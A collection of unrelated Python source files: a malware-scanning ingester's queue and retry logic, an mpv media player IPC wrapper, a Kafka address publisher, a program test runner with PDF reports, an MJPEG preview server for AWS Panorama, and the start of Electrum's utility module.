'state:submitted AND times.submitted:[NOW-1DAY TO *] '
'AND submission.metadata.type:* '
'AND NOT submission.description:Resubmit*'
)
]
submissions = {}
submitted = {}
for submission in datastore.get_submissions(sids):
task = Task(submission)
if not task.original_selected or not task.root_sha256 or not task.scan_key:
continue
if forge.determine_ingest_queue(task.root_sha256) != ingestq_name:
continue
scan_key = task.scan_key
submissions[task.sid] = submission
submitted[scan_key] = task.sid
# Outstanding is the set of things Riak believes are being scanned.
outstanding = set(submitted.keys())
# Keys is the set of things middleman believes are being scanned.
keys = set(scanning.keys())
# Inflight is the set of submissions middleman and Riak agree are inflight.
inflight = outstanding.intersection(keys)
# Missing is the set of submissions middleman thinks are in flight but
# according to Riak are not incomplete.
missing = keys.difference(inflight)
# Process the set of submissions Riak believes are incomplete but
# middleman doesn't know about.
for scan_key in outstanding.difference(inflight):
sid = submitted.get(scan_key, None)
if not sid:
logger.info("Init: No sid found for incomplete")
continue
submission = submissions[sid]
task = Task(submission)
if not task.original_selected or not task.root_sha256 or not task.scan_key:
logger.info("Init: Not root_sha256 or original_selected")
continue
if not task.metadata:
logger.info(
"Init: Incomplete submission is not one of ours: %s", sid
)
stype = None
try:
stype = task.metadata.get('type', None)
except: # pylint: disable=W0702
logger.exception(
"Init: Incomplete submission has malformed metadata: %s", sid
)
if not stype:
logger.info("Init: Incomplete submission missing type: %s", sid)
raw = {
'metadata': task.metadata,
'overrides': get_submission_overrides(task, overrides),
'sha256': task.root_sha256,
'type': stype,
}
raw['overrides']['selected'] = task.original_selected
reinsert(datastore, " (incomplete)", Notice(raw), logger)
r = redis.StrictRedis(persistent['host'],
persistent['port'],
persistent['db'])
# Duplicates is the set of sha256s where a duplicate queue exists.
duplicates = [
x.replace(dup_prefix, '', 1) for x in r.keys(dup_prefix + '*')
]
# Process the set of duplicates where no scanning or riak entry exists.
for scan_key in set(duplicates).difference(outstanding.union(keys)):
raw = dupq.pop(dup_prefix + scan_key, blocking=False)
if not raw:
logger.warning("Init: Couldn't pop off dup queue (%s)", scan_key)
dupq.delete(dup_prefix + scan_key)
continue
reinsert(datastore, " (missed duplicate)", Notice(raw), logger)
while True:
res = completeq.pop(blocking=False)
if not res:
break
scan_key = completed(Task(res))
try:
missing.remove(scan_key)
except: # pylint: disable=W0702
pass
# Process the set of submissions middleman thinks are in flight but
# according to Riak are not incomplete.
for scan_key in missing:
raw = scanning.pop(scan_key)
if raw:
reinsert(datastore, '', Notice(raw), logger, retry_all=False)
# Set up time outs for all inflight submissions.
expiry_time = now(max_time)
for scan_key in inflight:
# No need to lock. We're the only thing running at this point.
timeouts.append(Timeout(expiry_time, scan_key))
signal.signal(signal.SIGINT, interrupt)
signal.signal(signal.SIGTERM, interrupt)
datastore.close()
# noinspection PyUnusedLocal
def interrupt(unused1, unused2): # pylint:disable=W0613
global running # pylint:disable=W0603
logger.info("Caught signal. Coming down...")
running = False
def is_alert(notice, score):
generate_alert = notice.get('generate_alert', True)
if not generate_alert:
return False
if score < threshold_value['critical']:
return False
return True
def is_whitelisted(notice): # df node def
reason, hit = get_whitelist_verdict(whitelist, notice)
hit = {x: dotdump(safe_str(y)) for x, y in hit.iteritems()}
sha256 = notice.get('sha256')
if not reason:
with whitelisted_lock:
reason = whitelisted.get(sha256, None)
if reason:
hit = 'cached'
if reason:
if hit != 'cached':
with whitelisted_lock:
whitelisted[sha256] = reason
notice.set(
'failure',
"Whitelisting due to reason %s (%s)" % (dotdump(safe_str(reason)), hit)
)
dropq.push(notice.raw) # df push push
ingester_counts.increment('ingest.whitelisted')
whitelister_counts.increment('whitelist.' + reason)
return reason
@exit_and_log
def maintain_inflight(): # df node def
while running:
# If we are scanning less than the max_waiting, submit more.
length = scanning.length() + submissionq.length()
if length < 0:
time.sleep(1)
continue
num = max_waiting - length
if num <= 0:
time.sleep(1)
continue
entries = uniqueq.pop(num) # df pull pop
if not entries:
time.sleep(1)
continue
for raw in entries:
# Remove the key event_timestamp if it exists.
raw.pop('event_timestamp', None)
submissionq.push(raw) # df push push
###############################################################################
#
# To calculate the probability of dropping an incoming submission we compare
# the number returned by random() which will be in the range [0,1) and the
# number returned by tanh() which will be in the range (-1,1).
#
# If length is less than maximum the number returned by tanh will be negative
# and so drop will always return False since the value returned by random()
# cannot be less than 0.
#
# If length is greater than maximum, drop will return False with a probability
# that increases as the distance between maximum and length increases:
#
# Length Chance of Dropping
#
# <= maximum 0
# 1.5 * maximum 0.76
# 2 * maximum 0.96
# 3 * maximum 0.999
#
###############################################################################
def must_drop(length, maximum):
return random() < drop_chance(length, maximum)
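# Spot-checking the table above with the functions as defined:
#   drop_chance(15000, 10000) == tanh(1.0) ~= 0.76
#   drop_chance(20000, 10000) == tanh(2.0) ~= 0.96
#   drop_chance(30000, 10000) == tanh(4.0) ~= 0.999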
@exit_and_log
def process_retries(): # df node def
while running:
raw = retryq.pop(timeout=1) # df pull pop
if not raw:
continue
retry_at = raw['retry_at']
delay = retry_at - now()
if delay >= 0.125:
retryq.unpop(raw)
time.sleep(min(delay, 1))
continue
ingestq.push(raw) # df push push
# noinspection PyBroadException
@exit_and_log
def process_timeouts(): # df node def
global timeouts # pylint:disable=W0603
with timeouts_lock:
current_time = now()
index = 0
for t in timeouts:
if t.time >= current_time:
break
index += 1
try:
timed_out(t.scan_key) # df push calls
except: # pylint: disable=W0702
logger.exception("Problem timing out %s:", t.scan_key)
timeouts = timeouts[index:]
def reinsert(datastore, msg, notice, out, retry_all=True):
sha256 = notice.get('sha256')
if not sha256:
logger.error("Invalid sha256: %s", notice.raw)
if forge.determine_ingest_queue(sha256) != ingestq_name:
return
pprevious, previous, score = None, False, None
if not notice.get('ignore_cache', False):
pprevious, previous, score, _ = check(datastore, notice)
if previous:
out.info("Init: Found%s: %s", msg, notice.get('sha256'))
finalize(pprevious, previous, score, notice)
elif retry_all or not score:
logger.info("Init: Retrying%s: %s", msg, notice.get('sha256'))
ingestq.push(notice.raw)
else:
logger.info("Init: Stale%s: %s", msg, notice.get('sha256'))
def retry(raw, scan_key, sha256, ex): # df node def
current_time = now()
notice = Notice(raw)
retries = notice.get('retries', 0) + 1
if retries > max_retries:
trace = ''
if ex and type(ex) != FileStoreException:
trace = ': ' + get_stacktrace_info(ex)
logger.error('Max retries exceeded for %s%s', sha256, trace)
dupq.delete(dup_prefix + scan_key)
elif expired(current_time - seconds(notice.get('ts', current_time)), 0):
logger.info('No point retrying expired submission for %s', sha256)
dupq.delete(dup_prefix + scan_key) # df pull delete
else:
logger.info('Requeuing %s (%s)', sha256, ex or 'unknown')
notice.set('retries', retries)
notice.set('retry_at', now(retry_delay))
retryq.push(notice.raw) # df push push
def return_exception(func, *args, **kwargs):
try:
func(*args, **kwargs)
return None
except Exception as ex: # pylint: disable=W0703
return ex
# noinspection PyBroadException
def seconds(t, default=0):
try:
try:
return float(t)
except ValueError:
return iso_to_epoch(t)
except: # pylint:disable=W0702
return default
def send_heartbeat():
t = now()
up_hours = (t - start_time) / (60.0 * 60.0)
queues = {}
drop_p = {}
for level in ('low', 'medium', 'critical', 'high'):
queues[level] = uniqueq.count(*priority_range[level])
threshold = sample_threshold[level]
drop_p[level] = 1 - max(0, drop_chance(queues[level], threshold))
heartbeat = {
'hostinfo': hostinfo,
'inflight': scanning.length(),
'ingest': ingestq.length(),
'ingesting': drop_p,
'queues': queues,
'shard': shard,
'up_hours': up_hours,
'waiting': submissionq.length(),
'ingest.bytes_completed': 0,
'ingest.bytes_ingested': 0,
'ingest.duplicates': 0,
'ingest.files_completed': 0,
'ingest.skipped': 0,
'ingest.submissions_completed': 0,
'ingest.submissions_ingested': 0,
'ingest.timed_out': 0,
'ingest.whitelisted': 0,
}
# Send ingester stats.
exported = ingester_counts.export()
# Add ingester stats to our heartbeat.
heartbeat.update(exported)
# Send our heartbeat.
raw = message.Message(to="*", sender='middleman',
mtype=message.MT_INGESTHEARTBEAT,
body=heartbeat).as_dict()
statusq.publish(raw)
# Send whitelister stats.
whitelister_counts.export()
@exit_and_log
def send_heartbeats():
while running:
send_heartbeat()
time.sleep(1)
def send_notification(notice, failure=None, logfunc=logger.info):
if failure:
notice.set('failure', failure)
failure = notice.get('failure', None)
if failure:
logfunc("%s: %s", failure, str(notice.raw))
queue_name = notice.get('notification_queue', False)
if not queue_name:
return
score = notice.get('al_score', 0)
threshold = notice.get('notification_threshold', None)
if threshold and score < int(threshold):
return
q = notificationq.get(queue_name, None)
if not q:
notificationq[queue_name] = q = \
queue.NamedQueue(queue_name, **persistent)
q.push(notice.raw)
@exit_and_log
def send_traffic():
real_trafficq = queue.CommsQueue('traffic')
while running:
msg = trafficq.pop(timeout=1)
if not msg:
continue
real_trafficq.publish(msg)
def should_resubmit(score):
# Resubmit:
#
# 100% with a score above 400.
# 10% with a score of 301 to 400.
# 1% with a score of 201 to 300.
# 0.1% with a score of 101 to 200.
# 0.01% with a score of 1 to 100.
# 0.001% with a score of 0.
# 0% with a score below 0.
if score < 0:
return False
if score > 400:
return True
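    # note: with Python 2 integer division, (500 - score) / 100 buckets the
    # score into bands of 100, which produces the stepped probabilities above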
resubmit_probability = 1.0 / 10 ** ((500 - score) / 100)
return random() < resubmit_probability
def stale(delta, errors):
if errors:
return delta >= incomplete_stale_after_seconds
else:
return delta >= stale_after_seconds
def submit(client, notice):
priority = notice.get('priority')
sha256 = notice.get('sha256')
hdr = notice.parse(
description=': '.join((default_prefix, sha256 or '')), **defaults
)
user = hdr.pop('submitter')
hdr.pop('priority', None)
path = notice.get('filename', None) or sha256
client.submit(sha256, path, priority, user, **hdr)
    with timeouts_lock:
        timeouts.append(Timeout(notice.get('scan_key'), now(max_time)))
# noinspection PyBroadException
@exit_and_log
def submitter(): # df node def
client = forge.get_submission_service()
datastore = forge.get_datastore()
while running:
try:
raw = submissionq.pop(timeout=1) # df pull pop
if not raw:
continue
# noinspection PyBroadException
try:
sha256 = raw['sha256']
except Exception: # pylint: disable=W0703
logger.exception("Malformed entry on submission queue:")
continue
if not sha256:
logger.error("Malformed entry on submission queue: %s", raw)
continue
notice = Notice(raw)
if drop(notice): # df push calls
continue
if is_whitelisted(notice): # df push calls
continue
pprevious, previous, score = None, False, None
if not notice.get('ignore_cache', False):
pprevious, previous, score, scan_key = check(datastore, notice)
if previous:
if not notice.get('resubmit_to', []) and not pprevious:
logger.warning("No psid for what looks like a resubmission of %s: %s", sha256, scan_key)
finalize(pprevious, previous, score, notice) # df push calls
continue
with ScanLock(scan_key):
if scanning.exists(scan_key):
logger.debug('Duplicate %s', sha256)
ingester_counts.increment('ingest.duplicates')
dupq.push(dup_prefix + scan_key, notice.raw) # df push push
continue
scanning.add(scan_key, notice.raw) # df push add
ex = return_exception(submit, client, notice)
if not ex:
continue
ingester_counts.increment('ingest.error')
should_retry = True
tex = type(ex)
if tex == FileStoreException:
ex = tex("Problem with file: %s" % sha256)
elif tex == CorruptedFileStoreException:
logger.error("Submission failed due to corrupted filestore: %s" % ex.message)
should_retry = False
else:
trace = get_stacktrace_info(ex)
logger.error("Submission failed: %s", trace)
raw = scanning.pop(scan_key)
if not raw:
                    logger.error('No scanning entry for %s', sha256)
continue
if not should_retry:
continue
retry(raw, scan_key, sha256, ex)
if tex == riak.RiakError:
raise ex # pylint: disable=E0702
except Exception: # pylint:disable=W0703
logger.exception("Unexpected error")
# Invoked when a timeout fires. (Timeouts always fire).
def timed_out(scan_key): # df node def
actual_timeout = False
with ScanLock(scan_key):
# Remove the entry from the hash of submissions in progress.
entry = scanning.pop(scan_key) # df pull pop
if entry:
actual_timeout = True
logger.error("Submission timed out for %s: %s", scan_key, str(entry))
dup = dupq.pop(dup_prefix + scan_key, blocking=False) # df pull pop
if dup:
actual_timeout = True
while dup:
logger.error("Submission timed out for %s: %s", scan_key, str(dup))
dup = dupq.pop(dup_prefix + scan_key, blocking=False)
if actual_timeout:
ingester_counts.increment('ingest.timed_out')
ingester_counts = counter.AutoExportingCounters(
name='ingester',
host=net.get_hostip(),
auto_flush=True,
auto_log=False,
export_interval_secs=config.system.update_interval,
channel=forge.get_metrics_sink())
whitelister_counts = counter.AutoExportingCounters(
name='whitelister',
host=net.get_hostip(),
auto_flush=True,
auto_log=False,
export_interval_secs=config.system.update_interval,
channel=forge.get_metrics_sink())
init()
Thread(target=maintain_inflight, name="maintain_inflight").start()
Thread(target=process_retries, name="process_retries").start()
Thread(target=send_heartbeats, name="send_heartbeats").start()
Thread(target=send_traffic, name="send_traffic").start()
# pylint: disable=C0321
for i in range(dropper_threads):
Thread(target=dropper, name="dropper_%s" % i).start() # df line thread
# noinspection PyRedeclaration
for i in range(ingester_threads):
Thread(target=ingester, name="ingester_%s" % i).start() # df line thread
# noinspection PyRedeclaration
for i in range(submitter_threads):
Thread(target=submitter, name="submitter_%s" % i).start() # df line thread
while running:
process_timeouts()
time.sleep(60)
# df text }
|
mediaplayer.py
|
import time
import json
import threading
import socket
from twisted.internet import reactor
class MediaPlayerProperty():
def __init__(self, property_, request_id):
self.property = property_
self.request_id = request_id
@property
def command(self):
return {'command': ['get_property', self.property],
'request_id': self.request_id}
class MediaPlayer():
"""MediaPlayer class is a representation of the mpv media player connected
via the mpv JSON IPC protocol (https://mpv.io/manual/master/#json-ipc). The
class uses a UNIX socket to connect to mpv and uses a daemon thread to
listen to responses from mpv.
"""
PROPERTY_PAUSED = MediaPlayerProperty('pause', 1)
PROPERTY_POSITION = MediaPlayerProperty('time-pos', 2)
PROPERTY_DURATION = MediaPlayerProperty('duration', 3)
PROPERTY_FILESIZE = MediaPlayerProperty('file-size', 4)
PROPERTY_FILENAME = MediaPlayerProperty('filename', 5)
def __init__(self, address):
"""Initialize the socket using the supplied address and start the
listener thread.
"""
self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.socket.connect(address)
self.listen_thread = threading.Thread(target=self.listen)
self.listen_thread.daemon = True
self.listen_thread.start()
def _send(self, command):
"""Send a command to the mpv socket. Accepts a dictionary and turns it
to a JSON byte-string before sending it to the socket.
"""
data = (json.dumps(command, separators=(',', ':')).encode('utf8'))
self.socket.send(data + b'\n')
def _get_property(self, player_property, variable):
"""Sends a command to the player requesting a property. Blocks until
property is returned and saved to specified instance variable.
"""
setattr(self, variable, None)
self._send(player_property.command)
while getattr(self, variable) is None:
time.sleep(0.05)
return getattr(self, variable)
@property
def duration(self):
"""Returns the total length of the current file as seconds (float).
Blocks until a value is returned.
"""
return self._get_property(MediaPlayer.PROPERTY_DURATION, '_duration')
@property
def filename(self):
"""Returns the file name of the current file as a string. Blocks until
a value is returned.
"""
return self._get_property(MediaPlayer.PROPERTY_FILENAME, '_filename')
@property
def filesize(self):
"""Returns the filesize of the current file as bytes (integer). Blocks
until a value is returned.
"""
return self._get_property(MediaPlayer.PROPERTY_FILESIZE, '_filesize')
def handle_event(self, data):
"""Triggers callbacks based on incoming events."""
"""TODO: Implement the method."""
pass
def handle_data(self, data):
"""Sets private instance variables to data returned by mpv. The
association between a value and property is done using the constant
request IDs that have been assigned to a particular property in the
code.
"""
if 'request_id' not in data:
return
if data['request_id'] == MediaPlayer.PROPERTY_PAUSED.request_id:
self._paused = data['data']
elif data['request_id'] == MediaPlayer.PROPERTY_POSITION.request_id:
self._position = data['data']
elif data['request_id'] == MediaPlayer.PROPERTY_DURATION.request_id:
self._duration = data['data']
elif data['request_id'] == MediaPlayer.PROPERTY_FILESIZE.request_id:
self._filesize = data['data']
elif data['request_id'] == MediaPlayer.PROPERTY_FILENAME.request_id:
self._filename = data['data']
def listen(self):
"""Method to be ran in a separate thread. Listens to the mpv UNIX
socket and sends events to MediaPlayer.handle_event and data responses
to MediaPlayer.handle_data.
"""
while True:
response_data = self.socket.recv(1024)
for message in str(response_data, 'utf8').strip().split('\n'):
                try:
                    response = json.loads(message)
                except json.decoder.JSONDecodeError:
                    # stop the reactor and skip the malformed message rather
                    # than falling through with `response` undefined
                    reactor.stop()
                    continue
if 'event' in response:
self.handle_event(response)
if 'error' in response and response['error'] == 'success':
self.handle_data(response)
def pause(self, state):
"""Tells the player to set paused status to state (boolean).
Asynchronous command and not verified in any way.
"""
command = {'command': ['set_property', 'pause', state]}
self._send(command)
@property
def paused(self):
"""Returns a boolean value indicating if the player is paused or not.
Blocks until a value is returned.
"""
return self._get_property(MediaPlayer.PROPERTY_PAUSED, '_paused')
@property
def position(self):
"""Returns the current playback position as seconds (float). Blocks
until a value is returned.
"""
return self._get_property(MediaPlayer.PROPERTY_POSITION, '_position')
def seek(self, position):
"""Seeks the player to the position in seconds (float).
Asynchronous command and not verified in any way.
"""
command = {'command': ['set_property', 'time-pos', position]}
self._send(command)
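if __name__ == '__main__':
    # Minimal usage sketch; '/tmp/mpvsocket' is an assumed path and must
    # match the --input-ipc-server argument mpv was started with.
    player = MediaPlayer('/tmp/mpvsocket')
    print('Playing {} ({:.0f}s)'.format(player.filename, player.duration))
    player.pause(True)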
|
address_publisher.py
|
"address_publisher.py - Takes addresses from Kafka and submit them to node"
from app import settings
from app.request_wrapper import RequestWrapper
from app.kafka_wrapper import Consumer
from prometheus_client import Gauge, Histogram, start_http_server
from queue import Queue
import logging
import threading
import time
log = logging.getLogger(__name__)
s = Histogram("address_publisher_processing_request_time", "Time of processing request", ["worker", "node"])
g = Gauge("address_publisher_queue_size", "Actual size of queue")
def worker(worker_number, queue):
log.info(f"worker-{worker_number}.consumer_created")
while True:
for node in settings.NODE_TO_ACCEPT_CONNECTIONS:
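            # note: queue.get() runs once per node, so each address is posted
            # to a single node in round-robin fashion rather than to all nodes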
log.info(f"worker-{worker_number}.queue_size={queue.qsize()}")
address = queue.get()
log.info(f"worker-{worker_number}.got_message_from_queue")
try:
start_time = time.time()
RequestWrapper(node).post_new_peer(address)
request_time = time.time() - start_time
s.labels(f"{worker_number}", node).observe(request_time)
except Exception:
log.exception("worker.address_posting_failed")
def fill_queue_worker(queue, consumer):
while True:
log.info("fill_queue_worker.start_filling")
g.set(queue.qsize())
for _ in range(settings.CHUNK_SIZE_FOR_CONSUMER):
queue.put(consumer.get_message())
log.info("fill_queue_worker.got_message_from_kafka")
time.sleep(settings.PUBLISHER_SLEEP)
def main():
log.info("main.creating_consumer")
consumer = Consumer(group_id="same_group")
log.info("main.obtained_consumer")
threads = []
queue = Queue()
for n in range(settings.WORKERS):
log.info(f"main.creating_worker_{n}")
thread = threading.Thread(target=worker, args=[n, queue])
threads.append(thread)
thread.start()
fill_queue_worker(queue, consumer)
if __name__ == "__main__":
start_http_server(8001)
main()
|
testio.py
|
import json
import sys
import subprocess
import multiprocessing
import re
import os
import errno
import fpdf
PROGRAM_PATH_JSON = "ProgramPath"
TIMEOUT_JSON = "Timeout"
TEST_JSON = r"Test\s?\d*"
TEST_INPUT_JSON = "input"
TEST_OUTPUT_JSON = "output"
TEST_PASSED_MSG = "Test passed successfully!"
TEST_FAILED_MSG = "Test failed :("
TEST_ERROR_MSG = "Your program contains errors :("
TEST_TIMEOUT_MSG = "Your program runs for too long :("
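# A hypothetical config file matching the keys above (illustrative only):
#
#     {
#         "ProgramPath": "solution.py",
#         "Timeout": 5,
#         "Test 1": {"input": ["1 2"], "output": ["3"]},
#         "Test 2": {"input": ["4 5"], "output": ["9"]}
#     }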
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class ProgramOutput:
def __init__(self, path, timeout, tests, leading_path = None):
self.path = os.path.join(leading_path, path) if leading_path else path
self.tests = tests
self.timeout = timeout
self.results = []
self.successful_tests = 0
self.run()
def run_test(self, test):
pipe = subprocess.Popen("python3 {}".format(self.path), shell=True, stdout = subprocess.PIPE,
stdin=subprocess.PIPE, stderr = subprocess.PIPE)
communication_result = None
try:
communication_result = pipe.communicate(input=test.input_to_str().encode(),
timeout=self.timeout)
except subprocess.TimeoutExpired:
self.results.append(('Timeout', ''))
return
assert(len(communication_result) == 2)
stdout = communication_result[0].decode("utf-8")[:-1]
stderr = communication_result[1].decode("utf-8")
if stdout == test.output_to_str() and not stderr:
self.successful_tests += 1
self.results.append((stdout, stderr))
def run(self):
for test in self.tests:
            # communicate(timeout=...) inside run_test enforces the per-test
            # timeout and records ('Timeout', '') on expiry
            self.run_test(test)
self.display_test_results()
def display_test_results(self):
pdf = fpdf.FPDF(format='letter')
pdf.add_page()
pdf.set_font("Arial", size=12)
msg = "{}Results for {} Passed: {}/{} Failed: {}/{}{}".format(
bcolors.HEADER, os.path.basename(self.path),
self.successful_tests, len(self.results),
len(self.results) - self.successful_tests,
len(self.results), bcolors.ENDC)
print(msg)
        pdf.multi_cell(0, 5, msg[5:-4] + '\n')  # strip 5-char color prefix and 4-char reset suffix
if len(self.tests) > len(self.results):
return
for test in self.tests:
stdout, stderr = self.results.pop(0)
ProgramOutput.display_test_result(stdout, stderr, test, pdf)
pdf.output("test_result_{}.pdf".format(os.path.splitext(os.path.basename(self.path))[0]))
@staticmethod
def display_test_result(stdout, stderr, test, pdf = None):
if len(stderr) > 0:
ProgramOutput.display_error_msg(stderr)
if pdf:
pdf.multi_cell(0, 5, stderr + '\n')
return
elif stdout == test.output_to_str():
print("{}{}".format(bcolors.OKGREEN, TEST_PASSED_MSG))
if pdf:
pdf.multi_cell(0, 5, TEST_PASSED_MSG + '\n')
elif stdout == 'Timeout':
print("{}{}".format(bcolors.WARNING, TEST_TIMEOUT_MSG))
if pdf:
pdf.multi_cell(0, 5, TEST_TIMEOUT_MSG + '\n')
else:
print("{}{}".format(bcolors.FAIL, TEST_FAILED_MSG))
if pdf:
pdf.multi_cell(0, 5, TEST_FAILED_MSG + '\n')
msg1 = "{:<15} {:<15} {:<15}".format("Input data:", "Expected:", "Result:")
msg2 = "{:<15} {:<15} {:<15}{}".format(test.input_to_str().replace("\n", " "),
test.output_to_str().replace("\n", " "), stdout.replace("\n", " "),
bcolors.ENDC)
print(msg1)
print(msg2)
if pdf:
            for msg in (msg1, msg2[:-4]):  # drop the 4-char ANSI reset suffix
pdf.multi_cell(0, 5, msg + '\n')
@staticmethod
def display_error_msg(stderr):
print("{}{}{}".format(bcolors.FAIL, TEST_ERROR_MSG, bcolors.ENDC))
print(stderr)
@staticmethod
def display_timeout_msg():
print("{}{}{}".format(bcolors.WARNING, TEST_TIMEOUT_MSG, bcolors.ENDC))
class Test:
def __init__(self, input_data, output):
self.input_data = input_data
self.output = output
def input_to_str(self):
if not self.input_data:
return ''
string = ''.join(data + '\n' for data in self.input_data)
return string[:-1]
def output_to_str(self):
if not self.output:
return ''
string = ''.join(data + '\n' for data in self.output)
return string[:-1]
class Parser:
def __init__(self, path):
self.data = None
self.tests = []
self.read_config_file(path)
self.validate_config_file()
def read_config_file(self, path):
try:
with open(path) as f:
self.data = json.load(f)
self.parse_tests()
except EnvironmentError:
print('Failed to open config file')
def parse_tests(self):
for key in self.data:
if re.compile(TEST_JSON).match(key):
test_data = self.data[key]
if TEST_INPUT_JSON in test_data and TEST_OUTPUT_JSON in test_data:
input_data = test_data[TEST_INPUT_JSON]
output = test_data[TEST_OUTPUT_JSON]
self.tests.append(Test(input_data, output))
def validate_config_file(self):
if PROGRAM_PATH_JSON not in self.data:
raise Exception('{} not found in config file!'.format(PROGRAM_PATH_JSON))
        if TIMEOUT_JSON not in self.data:
            raise Exception('{} not found in config file!'.format(TIMEOUT_JSON))
if len(self.tests) == 0:
raise Exception('no tests found in config file!')
def get_leading_path(path):
head, tail = os.path.split(path)
return head
def files_in_dir(path):
result = []
for _file in os.listdir(path):
if os.path.isfile(os.path.join(path, _file)) and not os.path.isdir(os.path.join(path, _file)):
result.append(_file)
return result
def file_exists(path):
if not os.path.isfile(path):
raise FileNotFoundError(errno.ENOENT, os.strerror(errno.ENOENT), path)
return True
def parse_command_line_args(args):
if len(args) > 1:
path = args[1]
if file_exists(path):
return path
else:
raise Exception("You have to provide path to config file as an argument!")
def test_program_output():
path = parse_command_line_args(sys.argv)
leading_path = get_leading_path(path)
parser = Parser(path)
data = parser.data
path = data[PROGRAM_PATH_JSON]
timeout = data[TIMEOUT_JSON]
if os.path.isdir(os.path.join(leading_path, path)):
for _file in files_in_dir(os.path.join(leading_path, path)):
ProgramOutput(_file, timeout, parser.tests, os.path.join(leading_path, path))
else:
ProgramOutput(path, timeout, parser.tests, leading_path)
if __name__ == "__main__":
test_program_output()
|
mjpeg_server.py
|
# Copyright (c) 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# This source code is subject to the terms found in the AWS Enterprise Customer Agreement.
"""
MJPEG server for Panorama inference output
"""
import logging
from http.server import BaseHTTPRequestHandler, HTTPServer
from io import StringIO
import cv2
from threading import Thread
from threading import Lock
import time
#logging.getLogger().setLevel('DEBUG')
#Globals
display_buffer = None
frames_received = False
mjpeg_lock = Lock()
mjpeg_file = 'preview.mjpg'
sleep_rate = 0.05
mjpeg_path = '/' + mjpeg_file
print('MJPEG Path: {}'.format(mjpeg_path))
class PanoramaMJPEGServerHandler(BaseHTTPRequestHandler):
"""
    Take frames from panorama inference output and serve it up as a rudimentary
screen scraper in the form of an MJPEG server. NOTE: You have to add the labels
and rectangles using OpenCV instead of the Panorama SDK for this to work
"""
def do_GET(self):
"""
Return mjpeg frames
"""
global display_buffer, frames_received
logging.debug("do_GET: {}", self.path)
if self.path == mjpeg_path:
try:
# Return if frames have not been received
if frames_received == False:
self.send_file_not_found()
return
else:
# Send 200 with the jpeg boundary
self.send_response(200)
self.send_header(
'Content-type',
'multipart/x-mixed-replace; boundary=--jpgboundary'
)
self.end_headers()
# Sit in a forever loop and keep serving up frames
while True:
# Acquire lock
logging.debug("Acquiring lock for jpg")
mjpeg_lock.acquire()
# Send the converted jpeg buffer
self.wfile.write("--jpgboundary".encode("utf-8"))
self.send_header('Content-type', 'image/jpeg')
self.send_header('Content-length', str(len(display_buffer)))
self.end_headers()
self.wfile.write(display_buffer)
# Release lock
logging.debug("Releasing lock for jpg")
mjpeg_lock.release()
time.sleep(sleep_rate)
except Exception as ex:
logging.error("Error in mjpeg serve: %s", str(ex))
mjpeg_lock.release()
else:
self.send_file_not_found()
def send_file_not_found(self):
"""
Send out 404 response
"""
logging.debug("Sending File not Found")
self.send_response(404)
        self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write('<html><head></head><body>'.encode("utf-8"))
self.wfile.write('<h1>Frames not received</h1>'.encode("utf-8"))
self.wfile.write('</body></html>'.encode("utf-8"))
class PanoramaMJPEGServer():
"""
Panorama MJPEG server interface. Create instance in init()
"""
def __init__(self, host='0.0.0.0', port=9000):
"""
Initialize HTTP server on port 9000. Note that you have to use the following command
over SSH to serve up the frames
iptables -I INPUT -p tcp --dport 9000 -j ACCEPT
"""
self.host = host
self.port = port
# Start the http server in a thread
self.server = HTTPServer((self.host, self.port),
PanoramaMJPEGServerHandler)
self.server.allow_reuse_address = True
self.http_thread = Thread(target=self.http_server_thread_function)
self.http_thread.setDaemon(True)
self.http_thread.start()
def http_server_thread_function(self):
"""
Run the http server in this thread
"""
global frames_received
self.server_started = True
try:
logging.info(
'Server initialized at http://{}:{}{}'.format(self.host, self.port, mjpeg_path))
self.server.serve_forever()
except Exception as ex:
logging.error("Error in httpserver: %s", str(ex))
self.server_started = False
finally:
self.server.server_close()
def feed_frame(self, display_array):
""" Feed frame into the mjpeg server class """
global display_buffer, frames_received
try:
# Don't serve until the first frame is received from panorama
frames_received = True
logging.debug("Acquiring lock for jpg")
mjpeg_lock.acquire()
logging.debug("Lock acquired")
ret, jpegfile = cv2.imencode('.jpg', display_array)
logging.debug("Return value when feeding frame: %s", ret)
            display_buffer = jpegfile.tobytes()  # tostring() is a deprecated alias
except Exception as ex:
logging.error("Error in mjpeg feed frame: %s", str(ex))
finally:
mjpeg_lock.release()
logging.debug("Lock released")
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
import decimal
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import stat
from pathlib import Path
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'FTC':8, 'mFTC':5, 'uFTC':2, 'sat':0}
base_units_inverse = inv_dict(base_units)
base_units_list = ['FTC', 'mFTC', 'uFTC', 'sat'] # list(dict) does not guarantee order
def decimal_point_to_base_unit_name(dp: int) -> str:
# e.g. 8 -> "BTC"
try:
return base_units_inverse[dp]
except KeyError:
raise Exception('Unknown base unit')
def base_unit_name_to_decimal_point(unit_name: str) -> int:
# e.g. "BTC" -> 8
try:
return base_units[unit_name]
except KeyError:
raise Exception('Unknown base unit')
